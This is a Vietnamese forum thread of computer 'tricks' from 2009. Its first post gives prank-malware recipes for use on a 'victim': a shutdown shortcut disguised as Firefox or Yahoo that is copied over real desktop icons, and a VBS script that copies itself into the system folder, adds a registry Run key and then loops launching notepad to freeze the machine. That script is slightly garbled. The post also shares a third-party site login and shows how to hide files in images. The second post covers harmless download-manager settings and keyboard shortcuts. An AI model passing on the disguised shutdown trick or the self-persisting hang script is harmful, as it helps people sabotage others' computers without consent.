1 số thủ thuật vui với máy tính (lượm lặt từ nhiều nơi)

Thảo luận trong 'CÔNG NGHỆ THÔNG TIN' bắt đầu bởi quabom92, 21/01/2009.

 1. quabom92

  quabom92 New Member

  ;)
  ******************************************
  Vì các thủ thuật dưới đây đều do em sưu tầm rồi copy vào USB nên ko nhớ nổi tên người cung cấp, do đó ko ghi nguồn đc, mong các bác viewer thông cảm dùm !!!!!!!!!!!!!!!!!!!!!!  Tạo Virut giả:
  Mình sẽ giúp các bạn tạo một con virut giả để lừa những ai non tay trong IT.Con virut này khi kích vào sẽ hiện lên bảng thông báo như sau: "Máy tính bạn đã bị xâm nhập bởi tôi" rồi chi sau 10s,máy tính của nạn nhân sẽ tự động shutdown.
  Cách làm:
  Ngoài dekstop bạn tạo một shortcut mới bằng cách chọn New/Shortcut và gõ lệnh sau vào bảng vừa bật ra (nhớ gõ chính xác nhé)
  shutdown.exe -s -t -c 10 "may tinh ban da bi xam nhap boi toi" .chú ý các dấu cách nhé,trong đó 10 là thời gian mà bạn định để máy tính tự động shutdown.Để khó bị lộ và ngụy trang một cách hoàn hảo cho chú virut này bạn hãy thay icon cho nó thành một chương trình quen thuộc mà ai cũng thường xuyên sử dụng như fifox hoặc yahooo và đổi tên cho nó giống hệt chương trình nó.
  Bây giờ bạn hãy ngắm lại nó coi,in hệt bản gốc,không thể phân biệt và kích vào thử xem--->khóc ngay.Bạn có thể send nó cho người khác bằng cách copy đè lên biểu tượng thật ngoài màn hình của máy victim.


  Desktop bất động:
  Mặc dù victim có kích thế nào vào các biểu tượng hoặc start hoặc làm j` đi nữa thì màn hình đesktop vẫn trơ ra đó không nhúc nhích,họ sẽ hoảng hồn (chắc chắn nếu họ là tay mơ trong máy tính).
  Cách làm:Bạn chụp ảnh màn hình máy tính bằng phím Print Screen SysRq
  trên bàn phím hoặc dùng công cụ chuyên nghiệp Snipping Tool đã tích hợp sẵn trong Win Vista nếu bạn dùng Win này.Sau đó save lại và lấy file ảnh này làm Wallpaper,sau đó chọn ẩn thanh Taskbar và ẩn hết Icon trên màn hình bằng cách chuột phải vào màn hình và chọn view / bỏ tích ở show icon--->Xong rồi,với những thủ thuật đơn giản này bạn sẽ lừa được rất nhiều người đó.


  Lấy Avatar của bạn bè một cách đơn giản
  Bạn của bạn có cái avatar "độc"-->Nhìn ngon lành quá-->Muốn "chôm" để sử dụng (hoặc đơn giản là muốn trêu ai đó),chỉ đơn giản là bạn gõ vào trình duyệt địa chỉ sau là có ảnh và sau đó là save về!

  http://img.msg.yahoo.com/avatar.php?yids=nick yahoo của người đó  Thủ thuật đơn giản để down ở trang rapid và megaupload (tuyệt đối thành công 100%)
  Bạn vào trang site http://bookilook.com và tạo một tài khoản còn nếu ngại thì đăng nhập với tài khoản boyngugat0it và pass mangmaytinh sau đó dán link của rapid hoặc megaupload vào rồi ấn download,bạn sẽ thấy ngạc nhiên đấy


  Làm treo máy chơi (chỉ 10 dòng lệnh có thể làm treo máy)
  tạo tập tin notepad mang thông tin sau và lưu tên với đuôi .vbs
  rồi gửi cho nạn nhân, chuyện vui sẽ xảy ra

  On Error Resume Next
  Set popo= Createobject("scripting.filesystemobject")
  popo.copyfile wscript.scriptfullname,cuong.GetSpecialFolder(1)& "\popo.vbs"
  Set popo2= CreateObject("WScript.Shell")popo2.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersio n\Ru n\cod e1","wscript.exe "&popo.GetSpecialFolder(0)& "\popo.vbs %"
  Set treomay= CreateObject("WScript.Shell")
  Do
  treomay.run "notepad",false
  loop


  Đặc biệt trước khi treo máy nó còn ghi vào regedit để chạy mỗi khi khởi động, nếu đã biết trước được cách thức thì cách khôi phục cũng không khó lắm : Cmd -> taskkill /F /IM notepad.exe


  Gửi thông điệp cho bạn gái vào trong ảnh ( giấu một file bất kì dưới ảnh)
  Bạn gửi cho bạn gái một bức ảnh qua yahoo,bạn gái nhận được một bức ảnh thật đẹp và cám ơn bạn nhưng bạn bảo cô ấy mở ảnh bằng winrar --->Cô ấy sẽ cám ơn vì nhận được một thông điệp dễ thương do bạn viết!Nghĩ sao đây....???

  -Bạn hãy nén một file bẩt kì (trong trường hợp này là file .txt có ghi thông điệp bằng winrar. vd maiyeu.rar
  -Để maiyeu.rar và file ảnh cần gửi vào một thư mục
  -vào Run/cmd gõ cd\ để về thư mục gốc sau đó gõ đường dẫn đến thư mục chứa 2 file đó(do dos không có dấu space trong tên file nên khuyên bạn nên để thẳng thư mục trong thư mục gốc)
  -Sau khi đã đứng ở thư mục chứa 2 file đó rồi bạn chỉ việc gõ lệnh sau:
  ví dụ:

  D:\>copy /b tenanh.duoimorong + maiyeu.rar tenanh.duoimorong

  -KHi đó bạn được một file ảnh giống hệt lúc đầu nhưng nó đã được ẩn giấu một file rar bên trong--->Bạn kiểm tra sẽ thấy nó nặng hơn so với file ban đầu
  Muốn xem thông điệp thì bạn cứ việc mở ảnh bằng winrar là okie!


  Tắt tiếng beep trong win XP

  Bạn mở Registry Editor bạn tìm đến khóa sau :
  Mã:
  HKEY_CURRENT_USER\Control Panel\Sound
  Tìm khóa mang tên là Beep thay đổi giá trị của nó thành no . Khởi động lại máy tính


  Đóng dấu tên mình lên thanh taskbar
  Chỉ với một thủ thuật nhỏ,bạn tạo một thư mục lấy tên của bạn trong một ổ bât kì,chuột phải vào thanh taskbar/toolbar/newtoolbar -->dẫn đến thư mục vừa tạo-->okie.Tên của bạn đã nằm trên đó


  Làm trong suốt thư mục:
  Để ẩn thư mục, bạn có thể dùng đến các phần mềm. Tuy nhiên với thủ thuật nhỏ làm trong suốt thư mục dưới đây, bạn hoàn toàn có thể làm ẩn thư mục với tay không mà không cần đến bất kỳ phần mềm nào.
  Bạn tạo mới một thư mục hoặc chọn một thư mục có sẵn. Trong khi đặt tên (đối với trường hợp tạo thư mục mới) hoặc đổi tên (đối với trường hợp chọn thư mục cũ), nhấn giữ phím Alt và nhập vào dãy số: 0160. Xong nhả phím Alt. Lúc này tên thư mục đã bị bỏ đi và được thay thế bằng khoảng trắng.
  Tiếp theo, bạn cần làm cho thư mục đó không nhìn thấy được. Nhấn phải chuột lên thư mục chọn Properties, chuyển sang thẻ Customize. Nhấn nút Change Icon dưới mục Folder Icons. Ở cửa sổ Change Icon for Folder, kéo thanh cuộn và tìm biểu tượng thư mục có dạng khoảng trống. Nhấn chuột chọn biểu tượng đó và nhấn OK.
  Bạn hãy xem kết quả, thư mục đã trong suốt hoàn toàn và không thể nhìn thấy. Tuy nhiên nếu bạn chọn (nhấn chuột) vào thư mục đó thì nó sẽ được tô sáng.


  Vui với các game có sẵn trong win XP
  *Với trò FREECELL chỉ cần nhấn tổ hợp phím CTRL+SHIFT+F10 là bạn đã chiến thắng
  *Vơi trò Pinball bạn chỉ cần vào game và gõ "Hidden test" và thế là cứ lấy chuột mà cầm lấy quả bóng và...đập để lấy điểm-->bao nhiêu cũng được
  *Với trò Mineswiper (hay là dò mìn)
  Đầu tiên để màn hình desktop ở trạng thái none ,vào game và ấn xyzzy rồi tổ hợp phím SHIFT+ENTER, hãy để ý góc trái bên trên màn hình sẽ xuất hiện 1 dấu chấm nhỏ xíu màu trắng mổi khi bạn di chuột vào ô ko có bom ( tất nhiên ô có bom sẽ ko xuất hiện chấm trắng nhỏ đó )


  Code làm link ẩn trong 1 từ hoặc nhiều
  có lẽ nhiều bạn sẽ thắc mắc sao nhiều người hay có dòng :

  Trích:
  Click here to download
  và khi bạn click vào chữ here thì sẽ ra 1 website khác hoặc down 1 file
  Để thực hiện đơn giản chỉ là dùng lệnh sau
  Trích:
  <a href="http://google.com.vn/"> Click here </a>
  bạn có thể thay http://google.com.vn/ bằng tên web bạn cần ẩn và dòng chữ Click here bằng từ bạn muốn
   
  Chỉnh sửa cuối: 21/01/2009
  2 people like this.
 2. quabom92

  quabom92 New Member

  Chà chà mới post bài đầu tiên đã đc cảm ơn, thiệt quá phấn khích !!!!

  ****************** Khuyến mãi ******************

  I/ 5 bước tối ưu hóa cho Internet Download Manager:

  Chọn Options và thực hiện 5 bước sau đây:

  1. Thiết lập tự động download khi có đường link
  - Tại thẻ General:

  [​IMG]

  + Chọn Launch IDM on starup, nếu muốn chương trình tự động chạy khi khởi động máy tính.
  + Run module for click monitoring in IE-based browser: tự động hỏi có download file khi phát hiện ra đường dẫn.
  + Automatic start downloading of URLs placed to clipboard: Nếu chọn mục này, bạn chỉ việc bôi đen đường link và nhấn Crt + C, IDM sẽ tự động download file về.

  2. Thiết lập thêm những định dạng file


  [​IMG]

  - Bạn có thể thêm hoặc bớt những định dạng file mà IDM tự động tải về bằng cách vào thẻ File type.

  Mặc định của chương trình đã có khoảng 50 định dạng, nếu muốn thêm định dạng nào, ví dụ như *.FLV, hay *.SWF ( những định dạng phổ biến trên mạng hiện nay) chỉ việc gõ thêm vào, hoặc xóa bớt định dạng đó đi.  3. Tối ưu hóa tốc độ download  [​IMG]
  - Trong thẻ Connection, tại ô Connection Type/Speed: chuyển sang mức độ tối ưu nhất là Lan 10MBs.

  Mục Max connections number: chọn số kết nối tối ưu cho IDM là 16 thay vì mặc định là 8! Xong bước này, tốc độ download của IDM đã được nâng cấp lên rõ rệt.

  4. Thiết lập kiểm tra virut khi tải file về


  [​IMG]

  Để đảm bảo cho sự an tòan cho máy tính tính, nên vừa tải vừa kiểm tra file mình tải có bị “dính” virus hay không bằng chính phần mềm phần mềm diệt virut có sẵn trong máy.

  Tại thẻ Download, mục Virus checking scaner program, chọn Browser và tìm đến file chạy của chương trình diệt virut. (Bước này có thể giảm tốc độ download , nhưng bù lại sẽ tạo an tòan tuyệt đối cho máy tính của bạn).

  5. Tự động tải file ở những Website yêu cầu đăng nhập  [​IMG]

  Trong thẻ Site logins, chọn New, đìền địa chỉ Website. Và những thông tin để IDM tự động đăng nhập những lần download sau.


  II/ 17 phím tắt vô giá trên bàn phím:

  window: phím nằm giữa Ctrl và Alt (có hình 4 ô vuông kề nhau cách điệu)
  F2: Đặt lại tên file trong lúc vội vàng có thể khiến bạn dễ dàng thao tác sai - click quá nhanh và bạn tình cờ mở một file. Đơn giản hơn là hãy nhấn phím F2 trên bàn phím khi file được chọn.

  Ctrl + F2: Preview (xem lại) văn bản. Muốn bỏ chế độ preview, làm lại Ctrl + F2.

  Shift + F3: Để làm nổi bật đoạn văn bản bằng chữ in hoa, đơn giản là bôi đen đoạn văn bản, nhấn đồng thời phím Shift + F3. Nếu muốn cho đoạn văn bản trở lại chữ thường, hãy lập lại động tác nhấn đồng thời Shift + F3. Muốn cho chữ cái đầu tiên trở thành chữ in hoa, đặt con trỏ trước chữ đó và nhấn phím Shift + F3.

  Windows + E: Windows Explorer là cổng tới file và tài liệu của bạn song để mở nó thường phải liên quan đến desktop hoặc thanh Start Menu. Có một cách khác nhanh hơn là nhấn phím Windows-E và nó sẽ đưa bạn đến ngay Computer (Vista) hay My Computer (XP), một vị trí mặc định sẵn.

  Windows + F: Tìm kiếm file có thể là một rắc rối nếu bạn là một người tích trữ tài liệu và cách không lãng phí thời gian săn tìm file là sử dụng phím tắt <Windows-F>, sẽ mở ra một cửa sổ tìm kiếm và điền vào càng nhiều thông tin có thể về file bạn đang cần tìm.

  Windows + L: Động tác này sẽ khóa ngay PC của bạn mà không cần chờ cho đến khi chế độ bảo vệ màn hình hoạt động.

  Windows + M: Vào cuối ngày làm việc, mọi người bị bội thực với một bộ sưu tập các cửa sổ đang mở. <Windows-M> sẽ thu nhỏ những cửa sổ này để lộ ra màn hình chính (desktop) và <Shift-Windows- M> sẽ khôi phục lại những thứ bạn đã bị thu nhỏ trước đó.

  Windows + R: Hộp Run này là cách tiết kiệm thời gian cực lớn với XP. Từ đây, bạn có thể mở tất cả loại ứng dụng mà không cần chuột.

  Windows + F1: Trong khi F1 sẽ đưa ra cho bạn file Help (Hỗ trợ) trong hầu hết các ứng dụng, <Windows-F1> sẽ mở cửa sổ Windows Help. Điều này có thể giúp bạn tiết kiệm thời gian khi bạn không thể nhớ làm thế nào thay đổi một sự sắp đặt hoặc tìm một tính năng nhất định.

  Windows + Tab: Chuyển dịch giữa các chương trình bạn đang sử dụng. Ở XP, bạn có thể chuyển các cửa sổ bằng cách nhấn phím <Windows-Tab> để chọn đơn vị taskbar với màu sắc khác (xám hoặc xanh) để nhấn mạnh, rồi dùng các phím điều hướng lên hoặc xuống. Nhấn phím Enter sẽ đưa bạn đến cửa sổ đã được lựa chọn.

  Windows + Pause/Break: Với những người nâng cấp và điều chỉnh phần cứng, truy cập quản lý thiết bị Device Manager và các cài đặt là một nhiệm vụ thường xuyên. Phím tắt này sẽ đem lại ngay cửa sổ cần thiết cho họ trong nháy mắt.

  Shift + Delete: Thùng rác Recycle Bin là chỗ tuyệt vời dành cho những ai hay xóa các file mà không suy nghĩ song nó cũng tiềm ẩn nguy cơ cho phép người khác có thể truy cập vào các file nhạy cảm. Giữ phím <Shift-Delete> (hoặc giữ phím Shift trong khi kéo file hoặc tệp vào thùng rác). Các file sẽ bị xóa ngay tức thì.

  Ctrl + Enter: Một khi bạn đã chọn thanh địa chỉ trong trình duyệt Firefox hoặc Internet Explorer, bạn có thể tiết kiệm thời gian bằng việc gõ chỉ phần giữa của một
   
  1 person likes this.
 3. vudangpc

  vudangpc New Member

  pro thit nhỉ
   

Chia sẻ trang này